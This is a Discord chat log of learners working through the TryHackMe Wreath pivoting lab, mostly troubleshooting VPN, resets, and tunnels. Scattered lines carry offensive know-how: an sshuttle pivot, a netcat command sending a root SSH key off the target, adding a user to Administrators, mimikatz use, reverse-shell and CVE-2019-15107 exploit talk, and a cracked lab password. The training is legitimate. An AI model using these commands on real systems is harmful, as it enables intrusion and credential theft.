Try re-downloading your wreath VPN package and connecting with that one, I had to do that at one time

As it says in the room, you get chucked out every ten days and have to rejoin the room. That usually means requiring a new VPN pack for a new subnet

Answers remain and each subnet is identical, however

any pros and cons on sshuttle method?

there's some listed in the task that explains it. you have to have SSH access and the endpoint has to be Linux from what I remember

• needs python on the target

Hi. Can someone help with sshuttle?

I can't get it to work for scanning internal network

I use following command to set it up:
||sudo sshuttle -r root@10.200.195.20 --ssh-cmd "ssh -i id_rsa" 10.200.195.0/24||

it says "connected to server", but seems like it does not really work. Scanning network with nmap gives same results as without sshuttle

what am I missing here?

Isn't the web server .200 ?

Yup

your command points to .20

I would also exclude the web server so you can still connect to it, with the -x switch

but otherwise it looks OK, assuming your lab is using 10.200.195.0/24

Sorry that was a typo on discord. In the command i use it is 200

I tried excluding but that did not solve neither

I can't speak to how nmap works over sshuttle, I used a static binary transferred to the web server to run my scan.

Sure it works, but i wanted to test sshuttle

Thank You, I will try soon!

Gave +1 Rep to @merry robin

Thank You, I will try soon!

-undelete -a

Up to 10 last deleted messages (last hour or 12 hours for premium):

1 minute ago (Wed Jan 19 19:23:28 2022) RafalM#0728 (ID 898677535091617844): Thank You, I will try soon!

just looking at this room. Do you still need to download a specific connection pkg if you want to use your own attack VM? I joined the room, am a member, but it still says "You don't have access to any networks" when I looked for the specific wreath VPN connection pkg that it suggests in the "accessing the network task". Or did you guys just use the attack box?

You have to download another connection file for wreath network. Once your join the wreath room, go to access, click on network and you will be able to download the connection file. So whenever you want to connect from your box, you will use the new *.ovpn

Hey everyone! I need your help! In Task 20 - Exploitation. I have tried to catch the shell back directly from the root@prod-serv machine. I have open port 15001 in the firewall, then with a nc static binaries, I have started a listener on that port. Then, from my Attack Kali machine, I have 1) Started a sshutle 2) Encoded the reverse shell Powershell payload with the IP:10.200.164.200 (root@prod-serv) and the correct IP (15001), but I can't get my shell back on the root@serv-prod. Anyone has an idea why? 😄

I'm on task 6 Exploitation. No matter what I do it says the host is unreachable. I checked on the access page and it says I'm connected. I can ping the internal virtual IP address but not 10.200.192.200. I'm not sure what to do?

I also disconnected and reconnected but get the same thing.

And regenerated the VPN

Sheesh, it was stopped. I had extended the time didn't realize it stopped.

your powershell payload there looks to be .150 ip, not .200

ohhh gosh... end of the week... Thanks to jake!

@stoic flicker scam

@icy viper

sorry for tagging both of you, I just suddenly saw Zojja online xD

No worries, thanks

Ok thanks for the ping

Gave +1 Rep to @small sapphire

hello, does the network go to sleep by itself or i have to do something, and when i come back to the room , will the progress ive already done still be there?

If someone resets, your progress will be lost.

You share the network with other people so don't expect to keep your progress

oh

so i have to do it all in one sitting

in order to not lose my progress by anyone

You don't, just get to a point where you can return to or you will have to repeat certain tasks

okay, thanks

Questions answered will stay, but box states will be reset

So keep keys and passwords

👍🏻

the id_rsa key is empty, is that a bug or just someone being an ass and deleting it from the machine?

@merry robin (sorry for ping)

Someone being an ass

welp, guess I am stuck until people vote to reset

hello people of the wreath, someone has accidentally or purposely removed the contents of the ID_RSA file on the webserver, therefore I ask if people can save what they are doing and help get the network reset, that would mean a lot 😄

Remember to state what instance you're on

Disconnect and DM me your config. I can add the key back

Oh sorry it was late for me so I just went to sleep in hopes it got reset over night

Oh yeah, forgot that

the subnet I am on is 10.200.196.x

I got the network reset through voting and it works now

hello,

So i was doing wreath box last night and suddenly i got disconnected

till now i am not able to ping or connect to server

even i voted for reset

if any one can help me with this?

Can someone help me reset the room?

can you help me with this?

just starting this...

When you need to restart wreath as you forgot where you were

Yeah, please everyone vote for a reset. This room seems broken somewhere. I have lost my inital foothold and can't re-do the process to attack with CVE 15107 and get my reverse shell back.😭 🥺

Remember to specify what instance you're on before requesting a reset in this channel

thanks cherrytree

Oh yeah sure. Sorry for that. But now I have 8 votes! So I'm alright. It's gonna reset. Thanks!

Gave +1 Rep to @strange bison

Am I missing something in my curl command? I am able to send my payload with python2 43777.py, but trying with CURL does not works... I'm wondering why. This is something I have already done, but this time it does not work. That's weird. And yes I have changed the script 43777 so for the path to be /web/exploit-amandine.php 🙂 Thanks for help!

-X "maj" is important. 🙂 Letting this error here in case it can help someone else 🙂

Idk what is the reason I'm unable to connect to the machine using the private key can anyone help me ?

same issue trying to change sshd

config and try to fix that

chmod 600 id_rsa

This may work

or try 400

Probably means someone's messed with it and removed the key

any solutions for this ?

i just reset the machine ,still same problem

me to same issue

Is this a great network for learning pivoting through AD ?

There is precisely zero active directory on Wreath

There's network pivoting though.

Oops must be wrong channel lol

I'm stuck at pivoting to personal comp .100 I've pivoted the first one ie .150 via chisel and proxychains but I'm not able to pivot on .100 using the same methodology.... If someone could explain me what I'm doing maybe in dm would be great help and I could further elaborate my cmds used and what I tried doing to pivot to .100..........

I used basically used chisel socks proxy to get to .150 and I access .150 via proxychains but I'm not able to do the same for .100 ......

Hey! I have the same error as you! Sending the payload the response is the Powershell help command. I have URL encoded it though...

use + rather than %20 as spaces for the powershell command

Thanks for the tip, but I feel that there is something else as I don't get any agents.

Gave +1 Rep to @oblique oar

hmm are you sure the payload is correct? i don't have vm up atm so ican't check sorry

also are you able to just run a normal command?

yah, a normal command is working so it's something with Empire I guess as I have checked for the firewall port open, checking for the file hierarchy and so on.

Ok got it. The error was in one of my listeners. Thanks for help again 🙂

Gave +1 Rep to @oblique oar

glad you got it sorted :)

@stoic flicker Nitro Scam ^

-ban 402508845815037953 -ddays 1 nitro scam

change your passwords, then appeal.

damnit why is yag not here...

guys can anyone help me why mimikatz not dumping anything ?

is it insufficient privileges ?

In your first command, try it without the tab space
privilege::debug the error starts from there

thanks @ancient oasis

i shouldn't smoke while learning tho

prolly for the best too

there seems to be an issue with the network. Can anybody confirm that? I cannot reach any of the machines anymore (neither via my machine nor via the attack box)

there are multiple instances of the network so you have to be more specific by mentioning the third octet in the IPs

prod server is on 10.200.187.200

Also verify that the network is actually up and running. It's been far too often that I do a network and it shuts down without me knowing.

network status is running

I think regen-ing the VPN has worked for people in the past. If not, I'm not on that subnet, and I'm not staff, so good luck 👍

nope. Has nothing to do with the VPN. I can ping a machine in the network but not prod-server

but thanks for the help tho

just reset the network and now everything works fine

Hello everyone, I know this is an old question, in my LAN the workstations list are no longer visible but accessible directly(using \pc_name), all connectivity diagnostic are ok (ping, nslookup, access to gateway, domain controller ok, etc.) we have windows 7,8 and 10 and sometimes they appear in the list but most of the time are hidden. Any leads?

Hi , I added in etc/hosts the IP address of the target, and it's working just fine to reach it via http://ip/. Now, although I DO have spawned a shell on the target (and I'm root), I thought I'd get (from the target machine) the id_rsa file (WITHOUT reading its content and copying it into clipboard). What I did was to just raise a simple.http server via Python3. All fine and dandy, but now, when I try to access the file fromthe attacking machine, although I try using http://ip/id_rsa file, and I've copied the file to the /tmp folder (which is where I've raised the http.server), whenever I try to wget the file from the Kali , I get some error, and the "httpS://NAMEid_rsa" unreachable. Does it make sense? Why is it happening? is there a way to force the damn thing to go where I want it? Also, I've already tried to remove the entry from /etc/hosts file; without success
Does it make sense? Why is it happening? is there a way to force the damn thing to go where I want it?

Are you trying wget https://...? (HTTPS and not HTTP)
Also, are you using the correct port for your http.server (default: 8000)?

mnope, tried wget via http, as I've spawned an http server via python3 -m http.server

although in the hosts file, I've added an entry for the machine

I can show you some print screens

But you didn't specify the port number, did you?
wget http://<host>:<port>/id_rsa

127.0.0.1 localhost
127.0.1.1 kali
10.200.193.200 thomaswreath.thm

I tried with/without a port

and for some reason, wget AUTOMATICALLY tries to dld the https://thomaswreath.thmid_rsa

You gotta verify yourself first to share an image

!docs verify

instead of getting the http://10.200.193.200/id_rsa

You aren't specifying the port number here
By default, wget would use 80 for HTTP and 443 for HTTPS

You could use netcat to transfer the private key

# on the target machine
nc -nvlp 15001 < id_rsa

# on your system
nc thomaswreath.thm 15001 > id_rsa

whaa

Never thought of that 😄

let me check right now

Hello everyone, I know this is an old question, in my LAN the workstations list are no longer visible but accessible directly(using \pc_name), all connectivity diagnostic are ok (ping, nslookup, access to gateway, domain controller ok, etc.) we have windows 7,8 and 10 and sometimes they appear in the list but most of the time are hidden. Any leads?

You may ask this in #infosec-general
This channel is for the wreath room😄

Hello everyone, I have a bit of problems here accessing the wreath network. May I ask it here or in the tech-support channel ?

You may ask here🙂

Yeah, idk if this is just me or the machine is actually down. I tried pinging it but it said unreachable

Is it running?

Yes, it is running

and I've connected with the vpn

however i could ping the opnvpn server

Was it working before or is that from the start?

yep, It was working before

I can't help with that then, you can wait for someone to help you troubleshoot it😄

Yeah, np. I think I need tech support for this one, idk.

It's working now, maybe someone or sth just able to make it back to work.

Oh yeah I have a question for this one. Could socat be used in the wreath prod-serv ? I found that there's a missing lib in the prod-serv.

Nvm, I just realized I was using a non-static binary one.

Successfully finished the network. Thank you for creating it @merry robin

Gave +1 Rep to @merry robin

Hi, I got in the web server but when I ping the rest of the network from the server, I only see the AWS gateway and the OpenVPN server. Am I missing something?

WDYM by the rest of the network, git-serv and wreath-pc?
If so, those are Windows machines and may not respond to PING by default

@stoic flicker Scam ^

Hey anyone knows why the wreath server does not show up in access even I joined the wreath room?

It is funny that someone would try to scam people on tryhackme server

-ban 325027101415833601 -ddays 1 Nitro Scam -- Compromised Account

🔨 Banned 325027101415833601 indefinitely

Got it. Thanks infloop!

Gave +1 Rep to @lusty saffron

Hello people. Does anyone having this kind of redirection when exploiting the git serv ?

Nvm, I put the wrong address there 😊

I have troubles with Wreath room, already posted a comment in room bugs. Can somebody please reset id_rsa key and http server, because somebody removed SSH access and probably stopped web server instance on lower and higher port? This is very annoying and I would appreciate help!

Or please vote a reset for me. Thanks

You need to specify the subnet that you're in

10.200.196.X

I was wondering why my multi/launcher stager didn't work. I kept using 100.200.... for the last 24 hours

I also have troubles with the id_rsa key
It throws the following error when I try to ssh the IP:

Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

I have the private key and have also ran chmod 600 id_rsa but still nothing. Any help would be appreciated.

I am having the same issue in the LFI room. Have you had any luck?

Yap. It worked when I did everything afresh. I restarted the open vpn service and then logged into the machine to grab the ssh keys again. Then boom! I just gained access through the ssh keys. Can't tell you specifically where the problem was. Sorry.

Perhaps inconsistent port was used ? Or your port forwarding wasn't running ?

he used 100.xxx.xxx.xxx instead of 10.xxx.xxx.xxx.
I made that too

Ah, how obvious

empty id_rsa on webserver machine.. wp guys, can we reset the machine?

+1

Or if someone on the network has the private key they could copy it back to the machine

need +2 resets

Sure i could copy it

People who has completed the wreath networks, I have a question for clearing logs. Is it necessary to clear the logs or could it be left untouched ?

You don't have to clear any logs

Remember that resetting the network reverts the VMs back to their clean fresh states

Hi I can’t reach the web server (57.200) but able to ping 57.250. Do we need a reset?

I‘m on .100 but the service with the unquoted service path isnt there anymore…

Apparently theres a cleanup script running on the machine but it doesnt actually fix that the service is broken

Yeah, the cleanup script just removes payloads. It should also be restarting the service though, unless someone removed either the script or the service

Go for a reset @surreal sail, and if you figure out who's screwing with it lemme know -- I can remove their access 🙂

Nah its fine i got system with another method

Ty for the help tho

Anyone got problems with using CVE_2019_15107.py? It outputs Failed to connect to https://10.200.193.200:10000/ idk why. I am connected to vpn and i can browse the website.

Are you connected using the Wreath's VPN config file or the regular one?

I created an user that is part of the Administrators and Remote Management Users group on git-serv. But when I login remotely using Evil-winrm, I’m not getting admin privileges. Is there a setting on git-serv that is restricting admin privileges in remote sessions? I’m not able to replicate this in my home machine.

Powershell remoting commands are run in a medium integrity process (I.e. as a regular user) -- which is one of the reasons you're told to use RDP for Mimikatz. If you find a workaround for that, please let me know!

Hmm….in my home VM, I’m able to maintain admin privileges when I remote in

hey, are you trying to add windows firewall rule?

Yeah need to open up a port to pivot to the pc. I can do it in a RDP session, just wondering if I can do the same in WinRM

Yes had the same problem about half an hour ago ... just try to login with administrator user in evil-winrm. That worked for me

but don't know why because the users had the same rights

E: Unable to locate package powershell-empire
E: Unable to locate package starkiller

Is that normal ?

it seems i can't get the packages from apt

Ok, nvm i just found that we can only get it from the git repo on ubuntu

just tried evil-winrm using administrator's hash and got admin privileges as well.

just tried logging in using the hash for the user i created. No luck.

Why use the hash if you know the password? 🤔

there's something special about the default Administrator account

for some reason when i login using winrm, I dont have admin privilege even thou the account is in the Administrators group

but when i login using the Administrator account, i get admin privileges

And you ran both of these for the account you made?

net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add

yes

When you're in with winrm on the account you created, can you see yourself in the groups using whoami /groups?

yes

then I genuinely have no clue

might be integrity of the process, but I don't know beyond that

ok no worries, I'll move on. Thanks.

Maybe it's because of the UAC of Windows because when you use local Administrator account there is normally no UAC but when you use an account created by you with administrative rights there will come the UAC

i am using Wreath's VPN, today it was working at first but now it's happening again

I don’t think that’s it. Works on a local account I created at home. Have you gotten past the AV on the PC? I tried uploading netcat from the GitHub link couple days ago and looked like it was blocked. I was planning to obfuscate a php reverse shell for windows but haven’t had a chance to try yet.

I'm not so far yet haha have not so much time at moment :/

Can someone help me with downloading a directory with Evil-winrm? i use download name_of_directory it says Download successful but there is nothing on my local machine

Ahhh got it 😅

@strange bison Discord Nitro^
Sorry no mods were online😅

Is it possible that windows defender blocked my IP because I run a script on the machine catched up by windows defender?

I don't think it blocks IPs.

since yesterday i run msfvenom exploit on the machine i'm unable to get a connection to the machine

Yeah, later in the room; it is mentioned that Windows Defender will prevent exploits with known signatures and metasploit, with no doubt, should be blocked by it.

Isn't it mentioned to build your own nc.exe program?

There may not be exact same words, but it is mentioned😅

nc.exe didn't work for me. nc64.exe worked

I cant access the wreath network at all.
There is no way to start the lab
Its not coming up in my networks tab

Any ideas?

i dont have a button to start the network

Try leaving and joining the room back

All good it worked 🙂

I left came back and used chrome

Thanks 🙂

Someone killed the ssh access to 10.200.101.200. If I leave the room and join again I get back in the same room. Any ideas?

Hi guys
I need soem help.....I am trying to get from the "prod-server" to the "git-server"
Started listener on "prod-server" but when running the powershell cmd to get a reverse shell from the "git-server" nothing happens.
If I run "whoami" on the "git-server" I get an answer.
Probably the powershell cmd is not working?
Or anything else that I am doing wrong?

maybe something is filtering packets?

is that port even open?

Scam? 🤔

malicious that

@hard mortar can you take care of that?

@humble jewel done

thanks

Thank you guys for the support. It is working now as it should.

YOU GOT THIS!

Is there a private network for subscription? If not there should be.

If you want your own network, you can get it:
#wreath-network message

That ain't part of the subscription though, and will almost certainly cost a fair chunk. These networks are not cheap to run which is why they're shared in the first place 🤷‍♂️

Thank you! I ask because we are using this specific room for a homework assignment and there is a deadline. Several of us are having a tough time with technical difficulties such as certain elements of the network not being available. Sometimes the wait time for a reset can be upwards of 3 hours. I will pass this on to the group and go from there.

Bear in mind that (especially with a group), you can each press reset once per hour, so that may speed things up a bit 🙂
If people are breaking stuff and you can identify who it is, let me know and I can kick 'em out of the room -- shared environments are no place for trolls 🤷‍♂️
Other than that there isn't a lot I can do about it personally, I'm afraid -- I still don't have a management console for it. If it's a recurring problem, maybe suggest to your school that they reach out to (probably) education@tryhackme.com to get some dedicated instances of the network created 🙂

Heard and I appreciate it! That's fantastic. One of the biggest problems were having is mostly a timing issue. We all have pretty obnoxiously disjointed schedules and have a hard time collaborating to get it reset

Someone or some people are clearly intentionally attacking the network it's been constantly down over the last two days. Super frustrating. Never enough people active to create a reset.

can someone explain sshuttle to me? It's requesting the password even though I'm supplying the private key

no issues when using ssh normally

It's wanting your local password

Run it with sudo

okay it's working now but also adds

Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.

nvm it's still working I'll diagnose that error later

@merry robin had a few hiccups along the way, but overall great room/network! I learned a ton

the git server on the 10.200.73 network is down for me. sitting at 6/8 for a reset currently

i'm still not able to access the git server on the 10.200.73. network even after a reset. anyone else having the same issue?

I'm not able to get access through ssh. After resetting the network I'm facing the same problem. What should I do?

checked again today and the git server is still down. i'm on task 33 and can't access the git server with evil winrm or ssh. it's not even responding to pings and this is after a reset

It might not respond to the pings because it's a Windows system

Three machines-
- .200 - prod-serv -> CentOS (Linux)
- .150 - git-serv -> Windows
- .100 - wreath-pc -> Windows

Also, it won't be accessible from your system. If that's what you're trying

i'm pretty sure it was responding to them when it was accessible 3 days ago, but i could be wrong

i've tried using my own vm and the attack box

i can't ssh into anymore from either machine

It will be accessible from the prod-serv, is that too not accessible?

it is. do i have to run evil-winrm from the prod server to get into the git server?

Yes

Or pivot, using tunnels or reverse proxies

gotchu. i'll give it another shot

i forgot to start up sshuttle. smooth brain on overload. thanks for the help @lusty saffron

Gave +1 Rep to @lusty saffron

I need help, the prod-server doenst respond, while i was setting up empire the server "crashed" or atleast he doenst respond to pings now, all ssh connections got disconnected i cant do anything than wait because nobody is voting to reset. What should i do?

The server status is also running

You can add a vote for a reset every hour

Yeah i already voted but thanks

Gave +1 Rep to @strange bison

Yes, but you can add another one every hour. It will add up.

Ok thx

Why is it showing this error (couldnt find anything online)

Same with Starkiller

Make sure the port is free, there isn’t another listener by the same name and that the IP is your actual machine’s IP.

I already tried diffrent Ports and in the room they are using the ip of the compromised linux server

What type of shell is it? Can you test it with your IP?

If i try my vpn ip it shows the same error

Are you using attackbox or a vm?

Im using a usb-booted version of parrot os

Everything works fine i tried other listeners too which worked

But if i try to use this one it throws an error

parrot on top, also, try resetting your vm or resetting empire-server.

haha

Ok i will try that

I think i have found the problem

I thought this was a special listener format but its just the name of a listener thats already there

But thx for the help

Gave +1 Rep to @small sapphire

Oh haha.

Np!

Same as you, unstable ssh connection / it doesn’t respond to ping some time. I have voted for a reset

hi all
is there something up with the wreath network?
unable to ping .150 git-srv

That's a Windows machine, won't respond to ping by default
EDIT: This isn't correct, please read below

Do you know why?
I suspect git server should be pingable from the webserver

Because for default configurations they don't send any reply to the ICMP ECHO requests, right?

Sorry, if that's incorrect regarding the wreath network
I think, I told the same to one more user earlier😅

There's more to it than that, and that's what matters.
Do you understand Zoned Firewalls? Windows blocks ICMP from the public zone. The VPN traffic is regarded as public zone. Traffic between machines will be private/home/whatever, doesn't block ICMP there.

It's not just incorrect regarding wreath, it's a nuance that matters all over THM and beyond.

Yeah, I know about that. Windows Firewall blocking it, I was reading it now 😅

hi all
trying to access pages on .100
ive got sshuttle and a chisel forward tunnel going
i'm finding that accessing .100 is taking a really long time
I understand a double pivot will never be fast, but any ideas on speeding things up?

@buoyant flume

Just finished Wreath
Amazing network, learnt a tonne
Was wondering if THM has anything else that's similar?

Maybe Holo.

I don't know if that's different in anyway.

It's a lot different, holo is rated hard and focuses on AD :)

no clicky

-ban 230063922810585088 -ddays 1 nitro discord scam spam. in case account was compromised, appeal the THM ban at bans@tryhackme.com

🔨 Banned Pol#3188 indefinitely

@fair breach

@strange bison

-ban @surreal sail -ddays 1 nitro discord scam spam. in case account was compromised, appeal the THM ban at bans@tryhackme.com

🔨 Banned mhaamahdhi#9206 indefinitely

hi all, i have a 7day badge and am a prem user how come under access in my profile i cant see anything in network?

Haha just figured it out

@static elk

Hello !
I lost the connection with machines, I tried to ping *.73.200 but every packet is lost (host unreachable). I have regenerated the vpn configuration but nothing works

Hi not sure if anybody else if having problems with task 20....When I forward the port of gitstack so I can access it via localhost I can get a connection, but within 20 seconds I get broken pipe errors. Reconnected VPN, rebooted my kali box (bare metal not a VM) and no go.

Hello, does anyone have id_rsa key to host 10.200.x.200? Because someone replaced it with this html site:

cat /root/.ssh/id_rsa

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://thomaswreath.thmroot/.ssh/id_rsa">here</a>.</p>
</body></html>

I have this problem second day in row. Tried vote to reset a box, without luck. I'm at task 18 and now really need to have working ssh 😄 not just stabilised shell.

Apologies to everyone else for the wall of text.

@strange robin Thank You 😉 You can delete your messege 🙂

Gave +1 Rep to @strange robin

Problem solved! Thanks Akward

Hi is anyone working on the box? I am on the very 1st step. Accessing the webpage doesn't seem to be possible: try Ip and domain name

The network reset earlier but it seems like everything has gone down again. Not sure if this is overloaded or not, but I can't do anything now. .200 is down along with the other host that will be next for you...

Going to give up and work on something else for now

it's a pity. It takes 8 votes to reset the machine.

I will not be able to work on it to prep for my upcoming exam

@errant harbor @late lodge Remember that there are several instances of Wreath. Problems in one do not reflect in others - saying it's reset isn't applicable to the other instances

how do I access other instances?

You don't.
I'm pointing it out because saying "the box" or "the network" for a reset, especially asking for resets, isn't so helpful.

Strange. I am having trouble nmapping both wreath and throwback. Ports that I know are open shows filtered

That points towards VPN issues IMO

Going a little crazy over here on Task 22, question "What is Thomas' password?"
The NTLM hash decodes to "i<3ruby", the official walkthrough video shows the password is "i<3ruby", but when I enter that into the answer box, it tells me I'm wrong. Anyone have any idea what I'm missing?

check the exact spelling or let the terminal put it in your clipboard.

I appreciate the advice! Unfortunately, I'm copy/pasting straight from CrackStation (with the hash 02d90eda8f6b6b06c32d5f207831101f). I've tried a few variations, including capitalizations, and nothing is being accepted.

Are you answering a taks, or trying to login?

Answering a task! Specifically, Task 21 question "What is Thomas' password?"

AH, I was getting confused as you originally said Task 22

Maybe a bug, as i can't put the password in either, and the hash is correct.#

Whoops! Thanks for the correction on the task. And thank you for taking the time to look at it. Honestly, it's just nice to know I'm not crazy over here 🙂